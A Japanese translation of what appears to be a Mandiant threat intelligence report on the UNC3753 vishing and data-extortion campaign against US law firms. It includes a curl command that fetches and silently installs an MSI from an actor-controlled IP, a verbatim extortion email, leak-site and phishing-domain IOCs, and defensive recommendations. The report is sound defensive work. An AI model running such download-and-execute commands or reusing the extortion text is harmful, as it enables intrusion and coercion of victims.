執筆者:Chad Reams、Tufail Ahmed、Keith Knapp、Ashley Frazer、Tyler McLellan
はじめに
2026年1月から5月にかけて、Mandiantは金銭的動機に基づくデータ窃取・恐喝キャンペーンを確認しました。このキャンペーンは、脅威クラスター UNC3753(「Luna Moth」「Chatty Spider」「Silent Ransom Group」とも呼ばれます)によって実行されており、米国内の専門サービス・法律・金融サービス分野の数十の組織が標的となっています。
UNC3753は、ボイスフィッシング(ビッシング)とソーシャルエンジニアリングによる欺瞞的手法を駆使して、標的企業の内部環境へのリモートアクセスを獲得します。攻撃者はデータ移行や請求書関連のメールを口実に使い、ITサポート担当者を装って標的に電話をかけます。そして画面共有セッションへの参加と、リモートモニタリング・管理(RMM)ツールのダウンロードを誘導します。環境への侵入に成功すると、攻撃者は自ら機密性の高いデータを探して窃取するか、被害者を操作してそれらの操作を代行させます。窃取されるデータには通常、機密性の高い法的契約書、個人を特定できる情報(PII)、財務記録などが含まれており、その後の恐喝に利用されます。
特筆すべき点として、UNC3753 との関連が疑われるインシデントでは、攻撃者が被害者のシステムに物理的に直接アクセスしたケースも確認されています。こうした物理的なインシデントでは、ITエンジニアを装った人物が企業オフィスに侵入し、USBストレージメディアを使ってエンドポイントから直接データを窃取しようと試みています。
本ブログ記事では、Mandiant Consultingが最近対応したインシデントレスポンス案件をもとに、この脅威グループの技術的な攻撃ライフサイクルを詳述するとともに、物理的なオフィスへの侵入といった新たな戦術を紹介し、エンドポイントとインフラを守るための実践的な推奨策をお伝えします。
脅威の詳細
UNC3753 のキャンペーンライフサイクルは、効率化された高速運用モデルを反映しています。Mandiantが調査した多くのインシデントでは、最初の標的へのコンタクトからデータ窃取・恐喝に至るまでの攻撃シーケンス全体が、わずか一営業日以内に完結していました。最近では、データの検索・ステージング・窃取が1時間以内に開始されるケースも確認されています。
この脅威グループは、攻撃者が管理するコンシューマー向けメールアカウントから、無害な請求書テーマのメールルアーを送りつけることでキャンペーンを開始することがよくあります。これらのメッセージには、有効なリンクや悪意のある添付ファイルは含まれていません。その代わり、「hello, here is the invcoie we talked about yesterday(昨日お話しした請求書を送ります)」といった短くありきたりな文言が記されているだけです。Google Threat Intelligence Group(GTIG)の評価によると、これらのメールの主な目的は口実を作ることにあり、標的の内部的なセキュリティ上の懸念を高めることで、その後のボイスコールに対して心理的に誘導されやすい状態を作り出しています。
図1:UNC3753の攻撃ライフサイクル
ITヘルプデスクへのなりすましによる初期アクセス
UNC3753 の侵入手法の核心は、標的を絞ったビッシングにあります。Mandiantの観察によると、このグループは組織のウェブサイトで公開されているすべての階層の従業員を標的にし、電話番号やメールアドレスを収集しています。そして組織内部のITヘルプデスクまたはセキュリティチームのメンバーを装い、これらの従業員に直接電話をかけます。
電話口でさまざまな口頭指示を使って標的の行動を誘導します。セキュリティ上の問題への対処や社内データ移行プロジェクトの支援を口実として信頼関係を築き、画面共有セッションへの参加を促します。
リモート画面制御と正規ツールの悪用
標的を誘導することに成功すると、攻撃者は従来の自動境界セキュリティやメールフィルタリングのコントロールを迂回します。具体的には、ユーザーに対して画面共有アプリケーションのダウンロードと実行を指示することで、これらの防御を回避します。
画面共有ユーティリティ
UNC3753 は、Zoom、Microsoft Terminal Services、Microsoft Teams、Quick Assist といった標準機能または商用サービスを使ったリモートデスクトップおよびサポートセッションを標的に開始させます。Teamsを介した侵入では、攻撃者が同一の標的に対して3日間にわたって5回の個別通話を実施したことも確認されています。
商用RMMエージェント
UNC3753 は、AnyDesk、Bomgar、Zoho Assist のインストーラーをダウンロードするよう標的をソーシャルエンジニアリングで誘導し、より持続的なアクセスの確立を試みることがよくあります。あるインシデントでは、攻撃者が標的を説得して cURL コマンドでペイロードをダウンロード・実行させることで「SuperOps RMMエージェント」のインストールを試みました。
Privnote を使ったメッセージ送信
攻撃者は、インストールリンクやコマンドを標的に送信する手段として、ウェブベースの自己消滅型テキストユーティリティである privnote[.]com を一貫して利用しています。この回避技術により、コピー&ペーストによる痕跡がエンドポイントのブラウザやチャットログに残らないようにしています。
UNC3753 のリモートセッションで確認された cURL コマンドのステージング文字列の例:
curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quietインフラのピボットとローカルステージング
今回の侵入では、BYOD(私有デバイスの業務利用)のリモート環境を悪用して社内の企業資産にアクセスする手法が確認されています。Mandiant Consultingが対応した複数の案件では、UNC3753 が標的の個人所有のBYODエンドポイント上で直接 Zoom セッションを確立しました。そして侵害した個人用ノートPCから、Windows 365(Windows365.exe)や Citrix クライアントなどのネイティブクライアントプラットフォームを使用して企業のVDI(仮想デスクトップインフラ)にアクセスしました。
VDI環境へのアクセスを確保すると、攻撃者は企業ファイルシステムへとピボットします。
-
システム列挙:ローカルディレクトリのマッピング、アクティブな OneDrive フォルダの列挙、マップされたネットワークドライブのクロールを実施します。
-
文書管理システムへの標的型収集:特定の法律文書や文書保管リポジトリを標的にします。
-
キーワード検索とファイルステージング:iManage 内のキーワード検索機能を利用して、税務書類(W-2、W-9、1099フォーム)、監査ファイル、法人クライアント契約書、社会保障番号(SSN)を含む機密性の高いフォルダを特定します。ステージングされたデータは、標的がアクセス可能なサブディレクトリ(主にユーザーのダウンロードフォルダやネイティブのRoamingプロファイルパス)に集約・整理されます。
データ窃取
UNC3753 はセキュリティコントロールを回避するため、さまざまな方法でステージングされたデータを外部に持ち出します。WinSCP や Rclone のポータブル版を頻繁に使用するほか、被害者のウェブブラウザ上で攻撃者が管理するコンシューマー向けファイル共有アカウントに直接ログインし、窃取したファイルを一括アップロードするケースもあります。
-
クラウドストレージへのステージング:標的に指示を出すか、画面を直接操作することで、ステージングされたフォルダを攻撃者管理のコンシューマー向けファイル共有アカウントにドラッグ&ドロップで送り込みます。複数のインシデントでは、流出先フォルダの名前が被害者組織のブランド名を模したものに意図的に変更されていました。
-
FTPユーティリティ:ブラウザ経由のアップロードがエンドポイント制御によって制限されている場合、攻撃者は主に WinSCP などのFTP・SFTPクライアントバイナリをダウンロードし、大量のデータパッケージを窃取します。あるインシデントでは、脅威グループが標的の OneDrive フォルダから 1.7 ギガバイトのデータを Google Drive アカウントに流出させた後、VDIセッションにピボットして WinSCP を使ってさらに 14.4 ギガバイトを窃取しました。Googleはこの活動に関連する Drive アカウントおよびアセットを無効化する対応を実施済みです。
-
メール転送:攻撃者は被害者に対して、社内の iManage リポジトリからファイルをステージングさせ、そのファイルを被害者のメールボックスから攻撃者が管理するコンシューマー向けメールアドレスに送信するよう指示するケースも確認されています。
攻撃者による恐喝の手口
この脅威クラスターは、データ窃取に成功した直後、多くの場合は標的環境から離脱してから30分以内に、ブランド名を明記しない恐喝メールをメールで送りつけます。
これらの非常に攻撃的な恐喝文書は、組織に対して3日以内の返答と身代金交渉の開始を求めます。被害組織が応答しない場合、攻撃者は標的の従業員や外部クライアントに直接電話・メールを行い、データ侵害を知らせると宣言します。恐喝文書では、情報漏洩によってクライアントの信頼が失墜し、多額の規制上の罰金が科され、外部クライアントがデータ管理不備を理由に被害組織を提訴する可能性があることが明示されています。さらにフォローアップメッセージとして、窃取したすべてのアーカイブを「LEAKEDDATA」データリークサイト(DLS)に公開すると脅迫することも確認されています。
恐喝メールのサンプル
Subject: [Victim Name] has lost confidential data of their clients. Very Important!
Hello,
We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. <mentions the general nature of the stolen documents>. This is not a joke or a scam.
This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.
Reply to Our email and We will show you the complete file tree and actual files.
We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.
We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.
In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.
In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.
Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.
Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.
As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.
Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.
All further communication can be done through this email address.
Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.
Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.
図2:UNC3753 恐喝文書のサンプル
データリークサイト
図3:LEAKEDDATA DLS(一部マスク処理済み・トリミング済み)
物理的アクセスを伴うUNC3753関連とみられる活動
UNC3753 は主にデジタル経由の攻撃手法に依存していますが、GTIGは関連する脅威アクターが物理的な直接アクセスによるデータ窃取も試みていると評価しています。このエスカレートする戦術は、FBI が最近発出したFBI Cyber FLASHアラートによって裏付けられています。同アラートでは、Silent Ransom Group の脅威アクターが企業オフィスへの物理的アクセスを利用して、リムーバブルUSBメディアで企業データの窃取を試みたインシデントが報告されています。
FBI のアドバイザリによると、リモートによるソーシャルエンジニアリングの試みが失敗した場合、攻撃者は実際に人員を被害者の物理的な所在地に送り込みます。現地に現れた脅威アクターは、セキュリティ上の問題に対処するためにデバイスのイメージングやローカルバックアップの作成が必要だと主張します。エンドポイントへのアクセスを得た後、外部ドライブに企業データを直接窃取しようと試みます。
限られた法科学的証拠と、その後の恐喝未遂が確認されていないことから正式な帰属判断は困難ですが、GTIGはこれらの物理的侵入がUNC3753と関連している可能性が高いと評価しています。その根拠は、構造的・時系列的・標的選定上の重複です。
帰属評価
GTIGは、インフラの重複、ドメインレジストラのトラッキング、標的選定の傾向、ステージングディレクトリの特徴に基づき、このキャンペーンおよび関連するソーシャルエンジニアリング活動を UNC3753 に帰属させています。UNC3753(別名:「Luna Moth」「Chatty Spider」「Silent Ransom Group(SRG)」)は、少なくとも2022年3月から活動する金銭的動機に基づく脅威クラスターです。UNC3753 は、2021年初頭から「Bazarcall」スタイルのキャンペーンを展開していた脅威クラスター UNC2686 とTTPの重複があります。UNC3753 は2022年に LOCKBIT.BLACK を展開しましたが、それ以降は LEAKEDDATA DLS への窃取ファイル公開を脅し手段とするデータ窃取のみの恐喝活動を優先するようになっています。この脅威クラスターは RMM ツールに大きく依存しており、BAZARLOADER の亜種や TRICKBOT、URSNIF、SILENTNIGHT を展開していた UNC2686 とは対照的です。当初、UNC3753 はサブスクリプションをテーマとした請求メールのルアー(偽のソフトウェア更新アラートなど)を使用し、典型的にはコールセンターの電話番号を記載したPDF添付ファイルを用いていました。2025年3月頃からは、社内の企業ITヘルプデスクスタッフを装う戦術に移行しています。
修復とセキュリティ強化
ボイスフィッシング、物理的なオフィスへの侵入、不正なエンドポイント制御のリスクを軽減するため、GTIGは組織に対して以下の緩和策の実施を推奨しています。
ユーザー教育
UNC3753 の戦術・技法・手順(TTP)に特化したユーザー意識向上トレーニングを実施してください。
物理アクセスと本人確認ポリシー
すべての外部委託業者、技術スタッフ、施設訪問者に対して、厳格な帯域外による本人確認コントロールを導入してください。以下の物理的管理策を義務付けてください。
-
訪問者に対して公式の資格証明書と顔写真付き身分証明書の提示を求めること。
-
フロントデスクのスタッフが、訪問者のID全件をアクセス許可前にコピーして記録すること。
-
すべての技術者の来訪について、検証済みの親組織またはヘルプデスクディスパッチャーと直接照合して事前スケジュールの作業指示書との整合を確認すること。
-
物理的な技術サービス担当者は常に企業の監督者が同行することを義務付けるポリシーを徹底すること。
リモートアクセスへの条件付きアクセス制御
VDI(仮想デスクトップインスタンス)またはVPN デバイスへの認証を企業所有デバイスのみに限定するため、リモートアクセスへの条件付きアクセスポリシーを実装してください。これにより、RMMツールの利用状況に対する組織の制御と可視性が向上します。
RMM・画面共有ソフトウェアの厳格な制御
未承認のリモートモニタリング・管理・サポートユーティリティのインストールと実行をブロックするために、企業環境を監査してください。承認されていないバイナリの実行を制限するアプリケーション制御ポリシー(Windows Defender Application Control またはサードパーティのエンドポイント保護ツールなど)を適用してください。また、Zoom や Teams などの承認済み仮想会議プラットフォームにおける双方向画面制御機能の制限も検討してください。
エンドポイントのリムーバブルメディア制限
物理的な窃取経路を無効化するために、すべての外部USBマスストレージデバイスの読み書き機能を無効化してください。グループポリシーオブジェクト(GPO)またはMDM構成を適用して、以下を制限してください。
-
USBストレージデバイスのインストール。
-
リムーバブルメディアへのアクセス。
-
VDIエントリを利用するすべての企業エンドポイントおよびBYODシステムでの光学メディアへの書き込み。
ネットワーク監視とアウトバウンド制御
ファイアウォールログ、ネットワークフロー、エンドポイントの実行ログを監視し、データ流出やステージング行為を示す兆候を検出してください。具体的には以下を実施してください。
-
未承認のファイル共有APIやメールへのアウトバウンド接続をブロックまたはアラート対象にする。
-
ファイアウォールログ設定で転送バイト数を含む完全なセッションログを有効にする。
-
内部VDIおよびエンドポイントからのSSHトラフィック(ポート22)を監視し、WinSCP および Rclone による大量転送を検出する。
アプリケーションログとアクセス監査
重要な文書保管システムの認証・アクセスメトリクスをレビューし、大量収集のプロファイルを特定してください。
-
iManage、SharePoint、および企業メールディレクトリに対して、急速なファイル検索、検索語の急増、大量ファイルダウンロードのリアルタイムアラートを設定する。
-
iManage などのビジネスクリティカルなデータリポジトリアプリケーションに多要素認証(MFA)を実装する。
-
BYODの厳格な認証制御を実装し、VDIノードへのアクセス時にMFAのステップアップ確認を要求する。
今後の展望と示唆
金銭的動機を持つ攻撃者による米国の法律・専門サービス組織への標的型攻撃は、業界にとって継続的なリスクです。法律サービス企業は、恐喝を目的とする攻撃者にとって格好の標的となっています。企業秘密である取引ファイル、M&A計画、クライアントの営業秘密、企業の規制報告書など、極めて機密性の高い情報が集中して保管されているためです。脅威グループは、法律業界が重大な評判上・規制上のリスクにさらされており、専門家としての地位を守るために恐喝問題を内々に解決しようとする動機が強いことを熟知しています。
攻撃者は、人間という要素——特に音声を使ったソーシャルエンジニアリング——を狙うことで、強固な技術的境界線、Webセキュリティゲートウェイ、MFA設定を容易に迂回できることを認識しています。
さらに、対面による物理的侵入の組み込みは、脅威能力のエスカレーションを意味します。ログベースの防御やエンドポイントテレメトリが成熟する一方で、企業の物理的な境界は往々にして行政的な手続きのみで保護されているにすぎません。組織は、物理施設へのアクセス制御とエンドポイントベースのハードウェアポリシーを、防御境界の同等の構成要素として扱う統合的なセキュリティ態勢への移行が求められます。
データリークサイト(DLS)
UNC3753 は、以下のウェブプラットフォームを利用して被害組織の身元と侵害されたデータを公開しています。
-
hxxps[:]//business-data-leaks[.]com
フィッシングドメイン
GTIGは、UNC3753 の関与が疑われるアクターによって特定の命名規則を用いたインフラ登録を確認しており、継続的なソーシャルエンジニアリングおよびビッシング活動を支援するものと評価しています。
-
<organization>-itdesk[.]com
-
<organization>-it[.]com
-
<organization>-helpdesk[.]com
侵害の痕跡(IOC)
本ブログ記事で説明した活動のハンティングと特定を広くコミュニティが行えるよう、侵害の痕跡(IOC)を登録ユーザー向けの GTI コレクションに掲載しています。
|
IOC タイプ |
インジケーター |
|
IPv4アドレス |
192.236.147.131 |
|
IPv4アドレス |
192.236.147.138 |
|
IPv4アドレス |
193.141.60.212 |
|
IPv4アドレス |
192.236.154.158 |
|
IPv4アドレス |
192.236.146.173 |
|
IPv4アドレス |
174.169.162.62 |
|
IPv4アドレス |
64.94.84.97 |
Google Security Operations(SecOps)
Google SecOps をご利用のお客様は、Mandiant Intel Emerging Threats ルールパックのもとで、以下をはじめとする幅広いカテゴリのルールにアクセスできます。本ブログ記事で説明した活動は、Google SecOps において以下のルール名で検出されます。
-
Execute MSI Files Downloaded via Curl
-
Suspected Rclone Exfiltration
MITRE ATT&CK
|
戦術 |
テクニック ID |
テクニック名 |
|
初期アクセス |
T1566.004 |
Phishing: Spearphishing Voice |
|
T1133 |
External Remote Services |
|
|
実行 |
T1204.002 |
User Execution: Malicious File |
|
T1059.001 |
Command and Scripting Interpreter: PowerShell |
|
|
T1059.003 |
Command and Scripting Interpreter: Windows Command Shell |
|
|
T1569.002 |
System Services: Service Execution |
|
|
持続性 |
T1053.005 |
Scheduled Task/Job: Scheduled Task |
|
T1547.001 |
Boot or Logon Autostart Execution: Registry Run Keys |
|
|
防御回避 |
T1036.005 |
Masquerading: Match Legitimate Name or Location |
|
T1553.002 |
Subvert Trust Controls: Code Signing |
|
|
T1562.001 |
Impair Defenses: Disable or Modify Tools |
|
|
T1070.001 |
Indicator Removal: Clear Windows Event Logs |
|
|
認証情報アクセス |
T1003.001 |
OS Credential Dumping: LSASS Memory |
|
T1003.002 |
OS Credential Dumping: Security Account Manager |
|
|
探索 |
T1083 |
File and Directory Discovery |
|
T1135 |
Network Share Discovery |
|
|
T1046 |
Network Service Discovery |
|
|
横展開 |
T1219 |
Remote Access Software |
|
T1021.001 |
Remote Services: Remote Desktop Protocol |
|
|
T1021.004 |
Remote Services: SSH |
|
|
収集 |
T1005 |
Data from Local System |
|
コマンド&コントロール |
T1572 |
Protocol Tunneling |
|
情報持ち出し |
T1020 |
Automated Exfiltration |
|
T1567.002 |
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
|
|
T1052.001 |
Exfiltration Over Physical Medium |
|
|
影響 |
T1486 |
Data Encrypted for Impact |
翻訳元: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/
